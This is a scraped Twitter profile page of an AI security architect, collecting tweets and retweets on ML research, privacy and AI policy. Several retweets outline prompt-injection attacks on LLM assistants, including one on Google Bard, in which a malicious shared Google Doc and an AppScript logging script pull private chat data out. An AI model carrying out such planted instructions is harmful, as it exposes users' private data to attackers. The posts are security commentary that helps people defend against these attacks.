Rich Harang(@rharang) 's Twitter Profileg
Rich Harang

@rharang

Using bad guys to catch math since 2010. Principal Security Architect (AI/ML) at NVIDIA. He/him. Personal account and opinions: `from std_disclaimers import *`.

ID:195915277

linkhttps://scholar.google.com/citations?user=TPkC91wAAAAJ&hl=en calendar_today27-09-2010 21:59:36

15,6K Tweets

2,8K Followers

681 Following

Matt Spike(@matspike) 's Twitter Profile Photo

OH when YOU say 'generalization' you're talking about INDUCTIVE INFERENCE ha ha ha no WE meant DEDUCTIVE INTERPOLATION all this time, hahaha sorry for that mix-up *loud scraping noise as goalposts get yanked into a new position*

account_circle
MMitchell(@mmitchell_ai) 's Twitter Profile Photo

If this is reproducible for LLMs, then if you care about the safety of AI systems, it's another reason why we need to measure data with at least the same scientific rigor as we use to evaluate models. By understanding the data, we can understand what the model may do. ๐Ÿงต

account_circle
xlr8harder(@xlr8harder) 's Twitter Profile Photo

So these GPT assistants are cool, but I still don't see how they're going to solve the third party prompt injection vulnerabilities as they continue adding more capabilities to assistant.

Kai Greshake you getting ready for this?

account_circle
infosecanon(@infosecanon) 's Twitter Profile Photo

They bought active duty military financial and health data for 20 cents. Under a foreign domain.

Please please please we need a US federal privacy law that makes this illegal.

account_circle
intelliJay-Z(@aymannadeem) 's Twitter Profile Photo

Bidenโ€™s Executive Order wonโ€™t save us. ๐Ÿšซ

Discover why I believe a nuanced approach, considering context and platform specifics, is essential when discussing policy decisions.

aymannadeem.com/artificial/intโ€ฆ

account_circle
Chomba Bupe(@ChombaBupe) 's Twitter Profile Photo

Transformers in-context learn to predict f(x_(n+1)) from a sequence s:

s = (x_1, f(x_1), x_2, f(x_2), . . . x_n, f(x_n), x_(n+1))

Only if it's seen similar examples before in the training set.

Which shows that transformers are doing approximate interpolative retrieval.

Transformers in-context learn to predict f(x_(n+1)) from a sequence s: s = (x_1, f(x_1), x_2, f(x_2), . . . x_n, f(x_n), x_(n+1)) Only if it's seen similar examples before in the training set. Which shows that transformers are doing approximate interpolative retrieval.
account_circle
Stella Biderman(@BlancheMinerva) 's Twitter Profile Photo

Integrations are a well-known and barley secured threat vector. If you're pro-API models because you trust the opsec of companies, you should rethink your priories.

account_circle
Simon Willison(@simonw) 's Twitter Profile Photo

This kind of data exfiltration attack is inevitable any time you give an LLM access to both private data and potentially untrusted inputs at the same time

The trick here is a malicious shared Google Doc combined with an exfiltration logging script hosted using AppScript

This kind of data exfiltration attack is inevitable any time you give an LLM access to both private data and potentially untrusted inputs at the same time The trick here is a malicious shared Google Doc combined with an exfiltration logging script hosted using AppScript
account_circle
Rich Harang(@rharang) 's Twitter Profile Photo

Anyone have a good prompt template to keep chatGPT from producing numbered/bullet lists? I can't seem to get it to stop doing it.

account_circle
Rich Harang(@rharang) 's Twitter Profile Photo

Outlook keeps hiding travel related emails from me, forcing me to explicitly do a manual search to be allowed to see them, even when they'e at the top of my goddamn inbox.

What the fuck is going on over there?

account_circle
Stephan Hoyer(@shoyer) 's Twitter Profile Photo

Something that I think is under-appreciated in the current AI mania is that more compute does not always result in better models. Sometimes, even with perfect knowledge, you can hit a wall.

A good example of this is weather prediction.

account_circle
Johann Rehberger(@wunderwuzzi23) 's Twitter Profile Photo

๐Ÿ‘‰Hacking Google Bard: From Prompt Injection to Data Exfiltration

A nice example of a high impact prompt injection attack that led to chat history exfiltration (delivered via forced Google Doc sharing) ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ



embracethered.com/blog/posts/202โ€ฆ

account_circle
Lysandre(@LysandreJik) 's Twitter Profile Photo

๐Ÿค— Transformers v4.35 is out, and safetensors serialization is now ๐ญ๐ก๐ž ๐๐ž๐Ÿ๐š๐ฎ๐ฅ๐ญ.

Saving a torch model using `save_pretrained` will now save it as a safetensors file containing only tensors.

Loading files in this format provides a much safer experience, why?

account_circle
moo(@moo_hax) 's Twitter Profile Photo

Itโ€™s real.

From detecting sandboxes with ML, all the way to now. I donโ€™t think I could be more excited to be part of an offensive ML company with Nick Landers

account_circle
dreadnode(@dreadnode) 's Twitter Profile Photo

We're live!

Dreadnode is all about AI red teaming and offensive ML. Founders are moo and Nick Landers. Follow us for research, tooling, evals, and challenges.

dreadnode.io

Let the real hacking begin.

We're live! Dreadnode is all about AI red teaming and offensive ML. Founders are @moo_hax and @monoxgas. Follow us for research, tooling, evals, and challenges. dreadnode.io Let the real hacking begin.
account_circle
Rich Harang(@rharang) 's Twitter Profile Photo

It has been ~~many~~ 0 days since I last had it forcibly driven home to me that optimizers give you what you _ask for_ and not what you _want_.

account_circle